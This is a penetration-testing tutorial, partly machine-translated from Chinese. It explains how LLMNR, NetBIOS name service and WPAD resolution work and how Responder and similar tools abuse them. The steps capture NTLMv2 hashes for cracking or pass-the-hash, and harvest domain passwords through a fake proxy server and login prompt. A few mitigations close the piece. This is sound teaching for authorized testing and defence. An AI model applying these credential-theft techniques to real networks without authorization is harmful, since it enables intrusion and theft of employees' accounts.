In the intranet penetration test, we can cheat the attack network configuration and services. This kind of attack mainly aims at the security hidden danger caused by the improper configuration of ARP (address resolution protocol), DHCP (Dynamic Host Configuration Protocol) and DNS server. Another common attack is man in the middle attack, which enables us to obtain sensitive information by monitoring network traffic. We can take security measures against network devices to prevent attacks. However, due to the inherent weakness of some protocols, this paper uses llmnr NetBIOS and wpad mechanism to carry out man in the middle attack.
Let's first understand the DNS query process, as shown in the figure:
The following are the key steps of DNS query in the intranet:
1 the hosts file in the file system
配置文件地址:C:\Windows\System32\drivers\etc
2 local DNS cache
CMD命令:ipconfig /displaydns
3 send DNS request to DNS server
4 send llmnr query
在DNS查询失败的时候使用
5 send netbios-ns query
它工作在OSI模型的会话层。NetBIOS是一个API不是一个windows操作系统之间的协议。
计算机的NetBIOS名字跟电脑名字是一样的
What are llmnr and netbios-ns
Llmnr (local link multicast name resolution) and netbios-ns (name service) are two components used by windows for name resolution and communication. Llmnr appears in later versions of Windows Vista, which is also a continuation of netbios-ns.
Llmnr provides point-to-point name resolution service for devices using IPv4, IPv6 or both addresses. It enables IPv4 and IPv6 devices in the same subnet to resolve each other's names without the need of wins or DNS server, which is not fully provided by wins and DNS. Although wins can provide client server and point-to-point name resolution services for IPv4, IPv6 addresses are not supported. As for DNS, although IPv4 and IPv6 addresses are supported, the name resolution service can only be provided through a special server. Llmnr makes up for the shortage of DNS by providing resolution service when DNS name resolution service is not available.
Llmnr protocol is often used when DNS server fails to parse, and the service port used is 5355 TCP / UDP. The default multicast service IP address used is ipv4:224.0.0.252 and IPv6: ff02:0:0:0:0:0:0:0:1:3
For example: Ping test.local in the intranet will first query the DNS server. When the DNS server is not found, the query request will be redirected to the llmnr protocol.
The following figure shows the packets captured during query:
NetBIOS is the system API of the local network, which has three NetBIOS services:
1 domain name service, using port 137 for domain name registration and domain name resolution
2 data distribution service, using port 138 to connect communication
3 session service, using 139 port for connection oriented communication
After DNS query fails, llmnr will call NetBIOS, generate a netbios-ns packet and send it out by broadcast.
This seemingly harmless protocol can be used for man in the middle attacks to obtain sensitive data, such as user name, hash, etc.
Test examples
Attack scenario simulation
Realization way
Recommended tools:
1 https://github.com/SpiderLabs/Responder
2 msf -- https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response
3 https://github.com/byt3bl33d3r/MITMf
Brief steps
1 use responder to specify network interface and start monitoring traffic
2 we try to connect \ \ filesrvr (a nonexistent host name)
3 get the hash of smb-ntlmv2
4 we already know the hash of NTLMv2. At this time, we can either brute force or pass the hash to use it.
Using WPAD
What is wpad
In general, for the sake of security, employees are not allowed to directly access the services of the external network, but they are allowed to access the resources of the external network through the web proxy. However, it is troublesome for employees to set up the proxy, so companies usually use wpad to automatically configure the proxy.
Wpad (web proxy auto discovery protocol) is a way for clients to probe the proxy server configuration script URL through DHCP or DNS protocol. After ie locates the script and downloads it to the local, it can select the corresponding proxy server for different URLs. At present, the mainstream browsers generally support wpad.
How wpad works
The client wants to use the access wpad.dat to configure the agent. If the DHCP server is not configured with wpad, go back to find the server named after wpad and then find the corresponding file. Then perform the following steps:
1 if the DHCP server is configured with wpad, get the wpad.dat file directly from the DHCP server and skip to step 4. Otherwise, go to the next step
2 send a request to the DNS server to find wpad.test.local, and then get the agent configuration file. If you successfully skip to step 4, otherwise, go to the next step
3 send llmnr to query wpad.test.local. If you successfully skip to step 4, unsuccessful proxy settings fail
4 download wpad.dat and configure
In the first step, we use DNS pollution attack to the second step. In the second step, we can also use DNS pollution attack. This attack mode can be prevented by configuring network devices. When querying through llmnr, the request will be broadcast to each client in the network. At this point, an attacker can send his wpad.dat file to the client as the wpad server does.
It is important that the wpad protocol is built into the windows operating system. This configuration can be seen in the LAN settings section of the Internet Explorer browser. The following diagram;
Using WPAD
Responder is a good utility for man in the middle attack. Responder provides a fake wpad server and responds to the client's wpad name resolution. Then provide a fake wpad.dat download. Responder creates an authentication program and requires the client to fill in the account password in the domain. In this way, you can get the employee's account password.
The following is a topology of wpad man in the middle attack:
To use responder:
1 provide fake HTTP server and wait for account password
2. Fake login box of responder
3 the obtained clear text is as follows
Methods to mitigate wpad attacks
1 specify the address of the wpad server on the DNS server
2 use group policy settings to prevent automatic detection of agent settings on all Internet browsers.